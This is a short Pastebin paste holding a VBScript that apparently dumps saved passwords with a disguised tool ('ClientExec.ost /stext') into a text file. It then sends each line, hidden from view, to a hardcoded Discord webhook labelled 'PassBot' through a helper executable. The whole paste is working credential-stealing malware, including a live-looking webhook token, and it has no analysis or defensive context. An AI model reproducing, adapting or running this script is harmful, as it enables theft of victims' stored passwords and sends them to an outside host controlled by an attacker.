Advertisement
Guest User

ye

a guest
Nov 12th, 2019
182
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Set oShell = CreateObject ("WScript.Shell")
  2. oShell.run "cmd.exe /c call ClientExec.ost /stext file.txt"
  3. Set fso = CreateObject("Scripting.FileSystemObject")
  4. Set dict = CreateObject("Scripting.Dictionary")
  5. Set file = fso.OpenTextFile("file.txt",1,,-1)
  6. row = 0
  7. Do Until file.AtEndOfStream
  8.     line = file.Readline
  9.     dict.Add row, line
  10.     row = row + 1
  11. Loop
  12.  
  13. file.Close
  14.  
  15. For Each line in dict.Items
  16.     oShell.run "ClientHelper.exe https://discordapp.com/api/webhooks/643696024329781250/iTm9Uhlz1tA093XMrmxvDhb9dm6eZ9BA5LL7oyYmTm2HJOO9dQxdooUnAPTOcvP23biy """ & line & """ PassBot", 0, False
  17.     WScript.Sleep(2000)
  18. Next
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement